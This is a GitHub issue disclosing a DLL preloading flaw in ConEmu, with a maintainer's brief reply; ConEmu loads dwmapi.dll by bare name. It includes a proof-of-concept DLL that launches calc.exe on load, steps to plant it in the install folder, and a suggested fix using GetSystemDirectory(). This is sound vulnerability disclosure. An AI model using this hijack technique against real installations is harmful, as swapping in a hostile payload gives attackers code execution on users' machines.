Attacker can execute arbitrary code execution using Dll Preloading Attack.
comalmot opened this issue · 1 comments
Versions
ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe
Problem description
When ComEmu64.exe is executed, CDwmHelper::InitDwm ()
Method is invoked. ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp )
and in this Method, when Loading dwmapi.dll
, LoadLibrary
Function has no flag to prevent DLL Preloading.
ConEmu/src/ConEmu/DwmHelper.cpp
Line 111 in 740b09c
mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));
so, attacker can moved to malicious dll file (filename is dwmapi.dll
) in Directory where ConEmuPack installed, and can execute arbitrary code excution.
Steps to reproduce
- Generate Malicious DLL File :
#include "pch.h"
#include "framework.h"
#include <Windows.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
this code invoke calc.exe
.
- put it down in directory ConEmuPack A is installed as
dwmapi.dll
- Just Click
ConEmu64.exe
.
Actual results
ConEmu.exe and ConEmu64.exe must not effect DLL Preloading,
Expected results
ConEmu.exe and ConEmu64.exe is effected by DLL Preloading,
Additional files
How to Solve
we can use Absolute Path
, and can use GetSystemDirectory()
function to combine the System Directory path with the DLL file name(in this case, dwmapi.dll
) to defend it.
Sorry for my Bad English 😢
Thank you for raising the issue. I'll address this problem ASAP